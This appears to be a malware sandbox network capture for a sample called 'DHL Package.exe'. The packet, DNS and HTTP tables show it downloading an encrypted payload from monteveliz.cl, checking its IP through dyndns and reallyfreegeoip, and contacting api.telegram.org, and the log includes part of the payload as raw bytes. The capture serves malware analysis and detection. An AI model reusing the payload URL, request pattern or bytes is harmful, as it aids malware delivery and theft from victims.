                                                                                              Aug 7, 2024 09:28:16.097407103 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.099364996 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.099462986 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.099585056 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.099663019 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.101520061 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.101629972 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.101753950 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.101814985 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.103854895 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.103955984 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.104074955 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.104156017 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.296833038 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.296960115 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.297044039 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.297113895 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.297183990 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.297239065 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.297239065 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.298986912 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.299124956 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.299185991 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.299392939 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.301111937 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.301239014 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.301322937 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.301399946 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.303320885 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.303452969 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.303528070 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.303601980 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.305530071 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.305658102 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.305691004 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.305852890 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.307606936 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.307729006 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.307862043 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.307939053 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.309863091 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.309989929 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.310050964 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.310139894 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.311894894 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.312041998 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.312149048 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.312236071 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.314049006 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.314160109 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.314321995 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.314321995 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.316211939 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.316325903 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.316478014 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.316536903 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.318648100 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.318826914 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.319051027 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.319284916 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.320828915 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.320951939 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.321182966 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.323163986 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.323292017 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.323420048 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.323482037 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.325375080 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.325433969 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.325568914 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.325613022 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.327363968 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.327419996 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.327683926 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.329545975 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.329603910 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.329727888 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:16.329854012 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:17.138060093 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:28:17.468606949 CEST8049741132.226.247.73192.168.11.20
                                                                                              Aug 7, 2024 09:28:17.469197989 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:28:17.469244957 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:28:17.799957991 CEST8049741132.226.247.73192.168.11.20
                                                                                              Aug 7, 2024 09:28:17.800096035 CEST8049741132.226.247.73192.168.11.20
                                                                                              Aug 7, 2024 09:28:17.825790882 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:28:18.156982899 CEST8049741132.226.247.73192.168.11.20
                                                                                              Aug 7, 2024 09:28:18.208910942 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:28:18.834070921 CEST49742443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:18.834086895 CEST44349742172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:18.834292889 CEST49742443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:18.847774029 CEST49742443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:18.847781897 CEST44349742172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:19.189946890 CEST44349742172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:19.190207005 CEST49742443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:19.194022894 CEST49742443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:19.194036007 CEST44349742172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:19.194315910 CEST44349742172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:19.224113941 CEST49742443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:19.264255047 CEST44349742172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:19.678261042 CEST44349742172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:19.678803921 CEST44349742172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:19.679069042 CEST49742443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:19.680444956 CEST49742443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:19.693484068 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:28:20.025669098 CEST8049741132.226.247.73192.168.11.20
                                                                                              Aug 7, 2024 09:28:20.028445005 CEST49743443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:20.028532982 CEST44349743172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:20.028824091 CEST49743443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:20.028992891 CEST49743443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:20.029043913 CEST44349743172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:20.067425966 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:28:20.373759985 CEST44349743172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:20.375688076 CEST49743443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:20.375746965 CEST44349743172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:20.751769066 CEST44349743172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:20.752448082 CEST44349743172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:20.752722979 CEST49743443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:20.752968073 CEST49743443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:20.755336046 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:28:21.081646919 CEST8049740172.93.120.113192.168.11.20
                                                                                              Aug 7, 2024 09:28:21.081957102 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:28:21.088993073 CEST8049741132.226.247.73192.168.11.20
                                                                                              Aug 7, 2024 09:28:21.089637041 CEST49744443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:21.089723110 CEST44349744172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:21.089899063 CEST49744443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:21.090161085 CEST49744443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:21.090219021 CEST44349744172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:21.129679918 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:28:21.429179907 CEST44349744172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:21.430510044 CEST49744443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:21.430535078 CEST44349744172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:21.807413101 CEST44349744172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:21.807964087 CEST44349744172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:21.808119059 CEST49744443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:21.808433056 CEST49744443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:21.810622931 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:28:22.142910004 CEST8049741132.226.247.73192.168.11.20
                                                                                              Aug 7, 2024 09:28:22.143496037 CEST49745443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:22.143583059 CEST44349745172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:22.143807888 CEST49745443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:22.144016981 CEST49745443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:22.144074917 CEST44349745172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:22.191951990 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:28:22.481729031 CEST44349745172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:22.483252048 CEST49745443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:22.483270884 CEST44349745172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:22.862370014 CEST44349745172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:22.862876892 CEST44349745172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:22.863076925 CEST49745443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:22.863352060 CEST49745443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:22.865736008 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:28:23.197529078 CEST8049741132.226.247.73192.168.11.20
                                                                                              Aug 7, 2024 09:28:23.198070049 CEST49746443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:23.198160887 CEST44349746172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:23.198395014 CEST49746443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:23.198617935 CEST49746443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:23.198662996 CEST44349746172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:23.238617897 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:28:23.542380095 CEST44349746172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:23.543744087 CEST49746443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:23.543807983 CEST44349746172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:23.929699898 CEST44349746172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:23.930206060 CEST44349746172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:23.930397987 CEST49746443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:23.930632114 CEST49746443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:23.932697058 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:28:24.264518023 CEST8049741132.226.247.73192.168.11.20
                                                                                              Aug 7, 2024 09:28:24.265100002 CEST49747443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:24.265197039 CEST44349747172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:24.265525103 CEST49747443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:24.265625954 CEST49747443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:24.265666008 CEST44349747172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:24.316458941 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:28:24.608098984 CEST44349747172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:24.609464884 CEST49747443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:24.609530926 CEST44349747172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:24.986746073 CEST44349747172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:24.986881018 CEST44349747172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:24.987099886 CEST49747443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:24.987399101 CEST49747443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:24.989842892 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:28:25.339840889 CEST8049741132.226.247.73192.168.11.20
                                                                                              Aug 7, 2024 09:28:25.340507984 CEST49748443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:25.340610981 CEST44349748172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:25.340835094 CEST49748443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:25.341058016 CEST49748443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:25.341115952 CEST44349748172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:25.394376993 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:28:25.679919958 CEST44349748172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:25.681385994 CEST49748443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:25.681396961 CEST44349748172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:26.060417891 CEST44349748172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:26.060965061 CEST44349748172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:26.061152935 CEST49748443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:26.061382055 CEST49748443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:26.063566923 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:28:26.395008087 CEST8049741132.226.247.73192.168.11.20
                                                                                              Aug 7, 2024 09:28:26.395596027 CEST49749443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:26.395694971 CEST44349749172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:26.395822048 CEST49749443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:26.396017075 CEST49749443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:26.396061897 CEST44349749172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:26.441062927 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:28:26.738612890 CEST44349749172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:26.740012884 CEST49749443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:26.740035057 CEST44349749172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:27.118879080 CEST44349749172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:27.119385004 CEST44349749172.67.177.134192.168.11.20
                                                                                              Aug 7, 2024 09:28:27.119570971 CEST49749443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:27.119846106 CEST49749443192.168.11.20172.67.177.134
                                                                                              Aug 7, 2024 09:28:33.108700037 CEST49750443192.168.11.20149.154.167.220
                                                                                              Aug 7, 2024 09:28:33.108720064 CEST44349750149.154.167.220192.168.11.20
                                                                                              Aug 7, 2024 09:28:33.108921051 CEST49750443192.168.11.20149.154.167.220
                                                                                              Aug 7, 2024 09:28:33.109215975 CEST49750443192.168.11.20149.154.167.220
                                                                                              Aug 7, 2024 09:28:33.109225035 CEST44349750149.154.167.220192.168.11.20
                                                                                              Aug 7, 2024 09:28:33.731827021 CEST44349750149.154.167.220192.168.11.20
                                                                                              Aug 7, 2024 09:28:33.732369900 CEST49750443192.168.11.20149.154.167.220
                                                                                              Aug 7, 2024 09:28:33.733712912 CEST49750443192.168.11.20149.154.167.220
                                                                                              Aug 7, 2024 09:28:33.733722925 CEST44349750149.154.167.220192.168.11.20
                                                                                              Aug 7, 2024 09:28:33.733966112 CEST44349750149.154.167.220192.168.11.20
                                                                                              Aug 7, 2024 09:28:33.735198021 CEST49750443192.168.11.20149.154.167.220
                                                                                              Aug 7, 2024 09:28:33.776223898 CEST44349750149.154.167.220192.168.11.20
                                                                                              Aug 7, 2024 09:28:33.776504040 CEST49750443192.168.11.20149.154.167.220
                                                                                              Aug 7, 2024 09:28:33.776519060 CEST44349750149.154.167.220192.168.11.20
                                                                                              Aug 7, 2024 09:28:34.383605003 CEST44349750149.154.167.220192.168.11.20
                                                                                              Aug 7, 2024 09:28:34.383707047 CEST44349750149.154.167.220192.168.11.20
                                                                                              Aug 7, 2024 09:28:34.383927107 CEST49750443192.168.11.20149.154.167.220
                                                                                              Aug 7, 2024 09:28:34.384448051 CEST49750443192.168.11.20149.154.167.220
                                                                                              Aug 7, 2024 09:29:31.394629002 CEST8049741132.226.247.73192.168.11.20
                                                                                              Aug 7, 2024 09:29:31.394939899 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:30:04.732037067 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:30:05.310066938 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:30:06.419532061 CEST4974180192.168.11.20132.226.247.73
                                                                                              Aug 7, 2024 09:30:06.450314999 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:30:06.750730038 CEST8049741132.226.247.73192.168.11.20
                                                                                              Aug 7, 2024 09:30:08.731122971 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:30:13.292529106 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:30:22.415636063 CEST4974080192.168.11.20172.93.120.113
                                                                                              Aug 7, 2024 09:30:40.661541939 CEST4974080192.168.11.20172.93.120.113
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Aug 7, 2024 09:28:14.745434046 CEST6042153192.168.11.201.1.1.1
                                                                                              Aug 7, 2024 09:28:15.126055002 CEST53604211.1.1.1192.168.11.20
                                                                                              Aug 7, 2024 09:28:16.967818022 CEST6344053192.168.11.201.1.1.1
                                                                                              Aug 7, 2024 09:28:17.133892059 CEST53634401.1.1.1192.168.11.20
                                                                                              Aug 7, 2024 09:28:18.656395912 CEST6525453192.168.11.201.1.1.1
                                                                                              Aug 7, 2024 09:28:18.833273888 CEST53652541.1.1.1192.168.11.20
                                                                                              Aug 7, 2024 09:28:32.944211006 CEST5189453192.168.11.201.1.1.1
                                                                                              Aug 7, 2024 09:28:33.108052015 CEST53518941.1.1.1192.168.11.20
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Aug 7, 2024 09:28:14.745434046 CEST192.168.11.201.1.1.10x4028Standard query (0)monteveliz.clA (IP address)IN (0x0001)false
                                                                                              Aug 7, 2024 09:28:16.967818022 CEST192.168.11.201.1.1.10x7b1cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Aug 7, 2024 09:28:18.656395912 CEST192.168.11.201.1.1.10x6ae1Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                              Aug 7, 2024 09:28:32.944211006 CEST192.168.11.201.1.1.10x648bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Aug 7, 2024 09:28:15.126055002 CEST1.1.1.1192.168.11.200x4028No error (0)monteveliz.cl172.93.120.113A (IP address)IN (0x0001)false
                                                                                              Aug 7, 2024 09:28:17.133892059 CEST1.1.1.1192.168.11.200x7b1cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Aug 7, 2024 09:28:17.133892059 CEST1.1.1.1192.168.11.200x7b1cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Aug 7, 2024 09:28:17.133892059 CEST1.1.1.1192.168.11.200x7b1cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Aug 7, 2024 09:28:17.133892059 CEST1.1.1.1192.168.11.200x7b1cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Aug 7, 2024 09:28:17.133892059 CEST1.1.1.1192.168.11.200x7b1cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Aug 7, 2024 09:28:17.133892059 CEST1.1.1.1192.168.11.200x7b1cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Aug 7, 2024 09:28:18.833273888 CEST1.1.1.1192.168.11.200x6ae1No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                              Aug 7, 2024 09:28:18.833273888 CEST1.1.1.1192.168.11.200x6ae1No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                              Aug 7, 2024 09:28:33.108052015 CEST1.1.1.1192.168.11.200x648bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                              • reallyfreegeoip.org
                                                                                              • api.telegram.org
                                                                                              • monteveliz.cl
                                                                                              • checkip.dyndns.org
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.11.2049740172.93.120.113804252C:\Users\user\Desktop\DHL Package.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Aug 7, 2024 09:28:15.363061905 CEST175OUTGET /SjZVauFBbad87.bin HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                              Host: monteveliz.cl
                                                                                              Cache-Control: no-cache
                                                                                              Aug 7, 2024 09:28:15.598361015 CEST1289INHTTP/1.1 200 OK
                                                                                              Date: Wed, 07 Aug 2024 07:28:15 GMT
                                                                                              Server: Apache
                                                                                              Last-Modified: Wed, 07 Aug 2024 00:36:46 GMT
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 133696
                                                                                              Content-Type: application/octet-stream
                                                                                              Data Raw: 1f 99 4e 45 d6 1f 85 60 c9 05 c3 a4 aa b2 09 e2 18 ce e1 55 e3 c2 13 64 1c 37 fa 42 04 72 b5 67 30 c3 be 0a ad 8d 8c 9e 6e ef 54 cd 0d ad c0 39 07 26 00 20 f9 78 f8 bd 16 f0 3b b3 59 fa 12 f1 da 46 cb e9 ed cb a3 27 11 63 72 ed 76 57 12 12 08 5d 00 c0 78 58 89 db 26 cd c0 d6 fe 23 b0 55 32 b0 25 ac fb 1a 75 fe 46 a6 be f3 71 8e 50 11 84 af ba 2a 34 2d f5 09 3a 01 d5 66 f7 b3 29 e8 bd 4a b8 97 1c 38 e6 8c 52 e1 7b 27 86 f8 46 55 a1 06 8b 43 b5 12 2c 45 b7 6f 0a d0 79 21 cc 04 d2 39 34 c1 55 78 fa 11 9e 5b 35 3b 42 be 3d a3 01 ed 1e b9 f1 49 0d 1d 08 38 79 0c 94 dd e2 9b f1 83 c3 60 8b c8 35 6a 37 9a e2 65 f4 ad a4 dd 49 d1 56 13 2f af 36 97 58 a9 78 52 4e 07 96 d7 38 bb dc 1c 42 a5 b8 ab da 9c 3b 9b 72 20 7f e2 1f 37 43 bf cd 24 1d bb fe f3 6f 12 57 ff 50 07 37 0a 81 6b 06 79 f5 b5 cb e2 00 c1 04 c9 f7 80 9d 1f 87 d8 95 3b 30 d6 67 0b 08 8a 63 20 3b 38 5c 81 ae 0f 55 4c 7a 4f 51 a2 ca bc 9f 4e 81 43 7c c6 f0 5a d7 03 5c 71 4d b6 cb bf 6e dc 79 2c c2 43 b6 d6 90 26 7b e0 b6 45 5b 9e 3d ae 0e 73 79 07 [TRUNCATED]
                                                                                              Data Ascii: NE`Ud7Brg0nT9& x;YF'crvW]xX&#U2%uFqP*4-:f)J8R{'FUC,Eoy!94Ux[5;B=I8y`5j7eIV/6XxRN8B;r 7C$oWP7ky;0gc ;8\ULzOQNC|Z\qMny,C&{E[=syXolB~lM4%<V8opsu LfVz%A*!|!nq&6l#.fN}BUl,M%w#dmy/O1`rD|e"z4fMN'(BX\'AS0q %3Ut7?l5a6rA"uGN?b#i\:U+`RsM}~M(dE=9m+U{Y:p|@VH@FeP:yC|E=8|%#*7 oDX%p1p++c98! U~B}wQ?G@SwX_<3Bhhjba^h%UA_xFh+Ljcn$WwT[!B)<6|sxQ'Y2ul7a$,5l7'2`G7~v/$9#ZHe/yLUEfd>07*.MRn[!FOs7f\b9WW P-s\#DHoC}' . [TRUNCATED]
                                                                                              Aug 7, 2024 09:28:15.598457098 CEST1289INData Raw: 00 dc 1b 54 5e e4 a7 7d 99 45 d6 04 a5 6b 21 0c 9f 7c 35 ee 7e cc 51 29 cc 44 f6 89 43 ec 34 fb fa 72 0a 29 4b 57 9a 65 3a 71 8c b7 89 36 ed b6 e2 d3 dc c2 c0 76 d7 b2 01 ca e7 c7 a3 5c d4 aa 40 71 1c b6 4e d3 a1 34 21 b6 a4 2f a3 9b 7b fe 9e ef
